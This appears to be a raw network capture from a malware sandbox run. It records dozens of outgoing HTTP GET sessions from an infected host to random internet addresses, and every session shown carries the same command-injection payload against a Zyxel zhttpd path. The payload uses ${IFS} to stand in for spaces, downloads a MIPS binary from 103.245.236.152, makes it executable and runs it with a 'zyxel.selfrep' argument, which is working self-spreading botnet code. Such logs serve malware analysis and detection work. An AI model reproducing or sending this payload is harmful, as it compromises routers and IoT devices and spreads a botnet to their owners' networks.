                                            Jan 14, 2024 15:50:52.668647051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7715192.168.2.2339796187.48.196.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668679953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7716192.168.2.233368250.250.223.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668684006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7717192.168.2.235395898.232.95.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668700933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7718192.168.2.2348482221.231.245.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668739080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7719192.168.2.2351376178.177.1.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668768883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7720192.168.2.2352500166.36.64.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668776035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7721192.168.2.2357402160.6.45.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668807983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7722192.168.2.2353430189.186.1.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668864965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7723192.168.2.2346940211.185.89.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668883085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7724192.168.2.233394658.142.238.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668919086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7725192.168.2.2333406188.84.24.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668931961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7726192.168.2.2332806129.151.147.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668941021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7727192.168.2.235547670.223.104.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668967962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7728192.168.2.2344042166.77.141.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669025898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7729192.168.2.2356578203.84.171.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669060946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7730192.168.2.2355262181.54.147.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669097900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7731192.168.2.235394436.225.81.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669126034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7732192.168.2.2334580200.151.106.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669163942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7733192.168.2.233601819.201.14.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669193029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7734192.168.2.2334704176.248.236.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669219017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7735192.168.2.2354094216.105.104.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669234991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7736192.168.2.2349378212.156.217.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669243097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7737192.168.2.234797663.41.22.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669296980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7738192.168.2.2345702187.205.85.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669353962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7739192.168.2.2345134183.192.121.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669373035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7740192.168.2.233541885.185.251.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669414997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7741192.168.2.233677464.9.92.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669435978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7742192.168.2.235839659.206.20.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669487953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7743192.168.2.2351654144.231.230.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669506073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7744192.168.2.2348630114.147.183.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669543028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7745192.168.2.2356012124.175.2.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669585943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7746192.168.2.2343606116.238.66.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669594049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7747192.168.2.2349282189.219.52.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669650078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7748192.168.2.234115285.63.73.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669665098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7749192.168.2.2357204141.17.69.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669691086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7750192.168.2.235127443.0.14.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669714928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7751192.168.2.2338896131.19.4.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669735909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7752192.168.2.235619861.82.135.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669764042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7753192.168.2.2342960219.226.66.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669804096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7754192.168.2.235299276.202.133.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669814110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7755192.168.2.235464850.210.229.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669835091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7756192.168.2.2356756157.184.192.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669868946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7757192.168.2.2360164170.235.152.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669872999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7758192.168.2.234055240.167.68.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669893980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7759192.168.2.234881482.118.10.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669909000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7760192.168.2.2346726193.196.151.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669970036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7761192.168.2.2349324151.119.100.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.669985056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7762192.168.2.2353860115.224.193.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670027018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7763192.168.2.2351882102.33.245.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670080900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7764192.168.2.2343110217.159.139.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670095921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7765192.168.2.2346682217.219.79.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670130968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7766192.168.2.234549899.169.251.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670130968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7767192.168.2.236009097.162.253.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670181036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7768192.168.2.2340190148.73.19.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670229912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7769192.168.2.234018037.71.90.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670264006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7770192.168.2.2334140117.185.204.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670277119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7771192.168.2.234246023.79.205.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670308113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7772192.168.2.233504012.231.167.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670325041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7773192.168.2.2341374218.90.97.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670348883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7774192.168.2.233891277.225.199.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670396090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7775192.168.2.235397871.188.35.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670412064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7776192.168.2.236036685.2.128.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670432091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7777192.168.2.235582251.36.3.103443
                                            TimestampBytes transferredDirectionData
